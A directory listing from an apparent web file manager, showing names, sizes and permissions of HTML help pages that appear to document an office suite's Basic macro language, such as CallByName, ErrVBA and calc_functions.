03120314.html File 6.78 KB 0644
03120315.html File 6.69 KB 0644
03120400.html File 4.81 KB 0644
03120401.html File 7.03 KB 0644
03120402.html File 5.21 KB 0644
03120403.html File 6.75 KB 0644
03120411.html File 8.16 KB 0644
03120412.html File 6.02 KB 0644
03130000.html File 7.96 KB 0644
03130100.html File 5.29 KB 0644
03130500.html File 10.06 KB 0644
03130600.html File 5.62 KB 0644
03130610.html File 5.86 KB 0644
03130700.html File 5.64 KB 0644
03130800.html File 5.37 KB 0644
03131000.html File 4.89 KB 0644
03131300.html File 4.89 KB 0644
03131400.html File 4.89 KB 0644
03131500.html File 5.13 KB 0644
03131600.html File 8.54 KB 0644
03131700.html File 5.09 KB 0644
03131800.html File 5.15 KB 0644
03131900.html File 6.89 KB 0644
03132000.html File 16.86 KB 0644
03132100.html File 5.69 KB 0644
03132200.html File 7.92 KB 0644
03132300.html File 9.17 KB 0644
03132400.html File 5.65 KB 0644
03132500.html File 4.46 KB 0644
03140000.html File 7.88 KB 0644
03140001.html File 7.6 KB 0644
03140002.html File 7.9 KB 0644
03140003.html File 7.08 KB 0644
03140004.html File 7.37 KB 0644
03140005.html File 7.57 KB 0644
03140006.html File 7.03 KB 0644
03140007.html File 7.74 KB 0644
03140008.html File 8.28 KB 0644
03140009.html File 7.73 KB 0644
03140010.html File 7.93 KB 0644
03140011.html File 7.22 KB 0644
03140012.html File 7.39 KB 0644
03150000.html File 11.16 KB 0644
03150001.html File 12.03 KB 0644
03150002.html File 6.96 KB 0644
03160000.html File 7.39 KB 0644
03170000.html File 8.8 KB 0644
03170010.html File 12.43 KB 0644
03170020.html File 11.82 KB 0644
05060700.html File 16.1 KB 0644
CallByName.html File 11.75 KB 0644
Compiler_options.html File 8.79 KB 0644
CreateUnoSvcWithArgs.html File 10.39 KB 0644
ErrVBA.html File 14.88 KB 0644
GetPathSeparator.html File 6.85 KB 0644
Resume.html File 9.34 KB 0644
calc_functions.html File 53.05 KB 0644
classmodule.html File 7.47 KB 0644
code-stubs.html File 5.29 KB 0644
collection.html File 18.13 KB 0644
color_scheme.html File 6.94 KB 0644
compatibilitymode.html File 11.71 KB 0644
compatible.html File 9.73 KB 0644
conventions.html File 9.84 KB 0644
doEvents.html File 6.76 KB 0644
enum.html File 8.82 KB 0644
exportasfixedformat.html File 8.9 KB 0644
fragments.html File 9.73 KB 0644
is_keyword.html File 7.13 KB 0644
keys.html File 7.72 KB 0644
main0211.html File 19.62 KB 0644
main0601.html File 12.57 KB 0644
new_keyword.html File 7.79 KB 0644
partition.html File 7.44 KB 0644
property.html File 16.61 KB 0644
replace.html File 8.63 KB 0644
special_vba_func.html File 17.09 KB 0644
stardesktop.html File 4.77 KB 0644
strconv.html File 13.49 KB 0644
thisdbdoc.html File 7.2 KB 0644
uno_objects.html File 12.42 KB 0644
vba_objects.html File 15.53 KB 0644
vbasupport.html File 7.61 KB 0644
Filemanager